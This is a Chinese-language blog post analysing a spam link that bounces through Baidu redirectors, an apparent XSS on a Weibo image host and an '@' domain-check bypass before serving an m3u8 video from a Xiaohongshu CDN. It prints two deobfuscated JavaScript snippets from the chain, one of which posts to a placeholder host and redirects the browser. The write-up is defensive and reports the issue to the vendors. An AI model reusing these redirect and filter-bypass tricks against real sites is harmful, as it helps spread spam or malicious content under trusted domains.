起因

朋友給我發了個網址

興沖沖的打開,結果跳轉了好幾次,是一個視頻。。。

emmm算了。。。畫面一出來對視頻本身就失去了興趣。。。

還是分析一下這個《專業防洪》吧

注:本文所有均為字的諧音

分析

訪問原始鏈接:hxxps://mr.baidu.com/KJd?????7e

重定向到:hxxps://m.baidu.com/56We56eY5Lq6/tc?bdver=2&bdenc=1&bdcl=3&nsrc=hxxp%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3D

URL解碼(啊其實這步瀏覽器幫忙做了),訪問

重定向到hxxp://www.baidu.com/link?url=a3f48d阿巴阿巴6d

再訪問

重定向到hxxp://static.hd.weibo.com/alk/avatar/IMG_CROP_xxxxxx.png#khy

誒?看起來好像應該是微博的頭像圖床,看起來還是個XSS

訪問一下

(果然)

誒?還有一層垃圾加密?

(AST還原一下)

 復制代碼 隱藏代碼
$.ajax({
  'url': "http://abc.cde/xhs.php?callback=?&id=" + window.location.hash.replace('#',''),
  'type': "post",
  'dataType': "json",
  'success': function (res) {
    window.location.replace(res.url);
  }
});

唔,這次是最后一層了吧

看一下請求。。。

。。。。你說你這要是放在正道上那才是正道的光呢。。。你看你這都幾家了=_=

再訪問。。

這個重定向有點意思??利用@繞過域名的限制

終于到最后了

又是加密。。。你煩不煩。。。解開看一下

 復制代碼 隱藏代碼
player({
  'url': "http://picasso-qiniu.xiaohongshu.com/athena-creator/" +  window.location.hash.replace('#', ''),
  'title': dec('bt')
});function dec(id) {
  var matched = window.location.search.substr(1).match(new RegExp("(^|&)"+id+"=([^&]*)(&|$)", 'i'));
  if (matched!= null) return decodeURI(matched[2]);
  return null;
}

終于,最后一層。

是一個m3u8文件,拿Play HLS插件或者逍遙哥的m3u8下載器或者類似的m3u8 DL-CLI下載器都可以下載。。。

此外!鏈接全部打碼處理是因為左后一個js很詭異,先不談鏈接多了一個.無法訪問,

去掉之后,現在訪問顯示臨時域名,不知道有啥用,不清楚是不是什么后門。。。

后記

這一個網頁用了幾層(我數不清了)跳轉。。。

涉及了百度網易新浪小紅書,就為了傳播一個視頻。。。。

還涉及到繞過域名檢測,繞過后綴檢測。。。

也是蠻拼的=_=

我們已經將此問題反饋給百度、網易、新浪官方。

紅隊 網站 web逆向
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接